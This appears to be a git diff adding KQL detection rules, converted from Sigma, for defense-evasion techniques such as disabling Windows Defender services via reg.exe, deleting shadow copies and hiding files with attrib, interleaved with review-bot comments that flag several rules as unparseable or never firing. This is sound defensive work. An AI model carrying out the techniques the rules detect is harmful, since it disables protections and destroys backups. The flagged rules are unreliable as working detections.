index 00000000..07766f9a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Security Service Disabled Via Reg.EXE
+// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
+// Date: 2021-07-14
+// Level: high
+// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
new file mode 100644
index 00000000..8800d03f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
@@ -0,0 +1,14 @@
+// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-05
+// Level: high
+// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
+This behavior has been observed in-the-wild by different threat actors.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Administrators building packages using iexpress.exe
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
new file mode 100644
index 00000000..6cb1c1f4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
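Review bot: The second description line `+This behavior has been observed in-the-wild by different threat actors.` is emitted without the `//` prefix, so this file is not valid KQL and the query fails to parse before the `DeviceProcessEvents` line is reached. The converter's multi-line description handling should prefix every continuation line with `// ` rather than only the first. The same defect is present in this patch in the Self Extraction Directive File rule, the Suspicious BitLocker Access Agent Update Utility rule and the Suspicious Copy From or To System Directory rule.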
@@ -0,0 +1,13 @@
+// Title: Self Extraction Directive File Created In Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
+These files are used by the "iexpress.exe" utility in order to create self extracting packages.
+Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql
new file mode 100644
index 00000000..e401310f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Service Registry Key Deleted Via Reg.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
new file mode 100644
index 00000000..681835b2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
@@ -0,0 +1,11 @@
+// Title: Set Suspicious Files as System Files Using Attrib.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/setuid_and_setgid.kql b/KQL/rules/Defense Evasion/setuid_and_setgid.kql
new file mode 100644
index 00000000..f7065aab
--- /dev/null
+++ b/KQL/rules/Defense Evasion/setuid_and_setgid.kql
@@ -0,0 +1,12 @@
+// Title: Setuid and Setgid
+// Author: Ömer Günal
+// Date: 2020-06-16
+// Level: low
+// Description: Detects suspicious change of file privileges with chown and chmod commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " chmod u+s" or ProcessCommandLine contains " chmod g+s") and ProcessCommandLine contains "chown root"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql
new file mode 100644
index 00000000..803df803
--- /dev/null
+++ b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql
@@ -0,0 +1,13 @@
+// Title: Shadow Copies Deletion Using Operating Systems Utilities
+// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies deletion using operating systems utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490
+// False Positives:
+// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
+// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql
new file mode 100644
index 00000000..a39bfd86
--- /dev/null
+++ b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql
@@ -0,0 +1,10 @@
+// Title: Shell32 DLL Execution in Suspicious Directory
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects shell32.dll executing a DLL in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/space_after_filename_macos.kql b/KQL/rules/Defense Evasion/space_after_filename_macos.kql
new file mode 100644
index 00000000..7bc2ca3c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/space_after_filename_macos.kql
@@ -0,0 +1,12 @@
+// Title: Space After Filename - macOS
+// Author: remotephone
+// Date: 2021-11-20
+// Level: low
+// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.006
+// False Positives:
+// - Mistyped commands or legitimate binaries named to match the pattern
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith " " or FolderPath endswith " "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql
new file mode 100644
index 00000000..3df69197
--- /dev/null
+++ b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql
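Review bot: In the Space After Filename hunk the title scopes the rule to macOS, but the query applies to every row of DeviceProcessEvents and `ProcessCommandLine endswith " "` alone fires on any command line that happens to end in whitespace, on any platform. If the macOS scope is intended, restrict the query to those devices, for example by joining DeviceInfo on DeviceId and filtering `OSPlatform == "macOS"`, or state in the header that the deployer must add that scoping; the low level in the header suggests the noise was expected but the platform constraint was part of the original intent.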
@@ -0,0 +1,12 @@
+// Title: Start of NT Virtual DOS Machine
+// Author: frack113
+// Date: 2022-07-16
+// Level: medium
+// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql
new file mode 100644
index 00000000..79d7382e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspect Svchost Activity
+// Author: David Burkett, @signalblur
+// Date: 2019-12-28
+// Level: high
+// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+// False Positives:
+// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql
new file mode 100644
index 00000000..2fcd7b4d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Advpack Call Via Rundll32.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: high
+// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql
new file mode 100644
index 00000000..14fcb2bd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: high
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe" or (ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql
new file mode 100644
index 00000000..1e09ffa9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Application Allowed Through Exploit Guard
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey endswith "\\Users\\Public*" or RegistryKey endswith "\\AppData\\Local\\Temp*" or RegistryKey endswith "\\Desktop*" or RegistryKey endswith "\\PerfLogs*" or RegistryKey endswith "\\Windows\\Temp*")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
new file mode 100644
index 00000000..67e98b86
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
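Review bot: The five path alternatives keep the Sigma wildcard as a literal asterisk, e.g. `RegistryKey endswith "\\Users\\Public*"`; `endswith` has no wildcard semantics and no real key path ends in `*`, so this rule can never fire. Rewrite them as a plain fragment match, e.g. `RegistryKey contains "\\Users\\Public"`, for each of the five entries. Controlled Folder Access records each allowed application as a value name under the AllowedApplications key, so the path being tested is likely to live in RegistryValueName rather than RegistryKey in this table — verify against a real event before shipping the rewrite.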
@@ -0,0 +1,12 @@
+// Title: Suspicious BitLocker Access Agent Update Utility Execution
+// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-18
+// Level: high
+// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.
+Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\baaupdate.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql
new file mode 100644
index 00000000..bad7a535
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Cabinet File Execution Via Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
+// Date: 2022-06-21
+// Level: medium
+// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Legitimate usage of ".diagcab" files
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab " or ProcessCommandLine contains " –cab " or ProcessCommandLine contains " —cab " or ProcessCommandLine contains " ―cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
new file mode 100644
index 00000000..506c97ea
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Calculator Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-09
+// Level: high
+// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql
new file mode 100644
index 00000000..884bc1cc
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Created as System
+// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
+// Date: 2019-10-26
+// Level: high
+// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql
new file mode 100644
index 00000000..db1a868c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql
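Review bot: The where clause is unsatisfiable: it requires `InitiatingProcessAccountName contains "AUTHORI"` (or `"AUTORI"`) and, in the same conjunction, `InitiatingProcessAccountName =~ "NETWORK SERVICE"` or `=~ "LOCAL SERVICE"`, neither of which contains that substring; the same contradiction applies to `AccountName contains "AUTHORI"` combined with `AccountName =~ "SYSTEM"`, so the rule can never produce a row. The six `startswith ""` predicates on the domain columns are vacuously true and add nothing. The source rule presumably matched the qualified user string (domain plus name) in one field, which the conversion split across the AccountName/AccountDomain pairs; move the AUTHORI/AUTORI checks to InitiatingProcessAccountDomain and AccountDomain and replace `startswith ""` with the intended domain comparison.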
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process of AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql
new file mode 100644
index 00000000..252212e7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe") and (not(((ProcessCommandLine contains "-queuereporting" or ProcessCommandLine contains "-responsepester") and (ProcessCommandLine contains "C:\\Windows\\system32\\WerConCpl.dll" and ProcessCommandLine contains "LaunchErcApp ") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql
new file mode 100644
index 00000000..90ae16f1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious CodePage Switch Via CHCP
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-10-14
+// Level: medium
+// Description: Detects a code page switch in command line or batch scripts to a rare language
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036, attack.defense-evasion
+// False Positives:
+// - Administrative activity (adjust code pages according to your organization's region)
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql
new file mode 100644
index 00000000..32aa93ca
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Control Panel DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-15
+// Level: high
+// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
new file mode 100644
index 00000000..19e22c22
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious Copy From or To System Directory
+// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
+Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)
+// - When cmd.exe and xcopy.exe are called directly
+// - When the command contains the keywords but not in the correct order
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
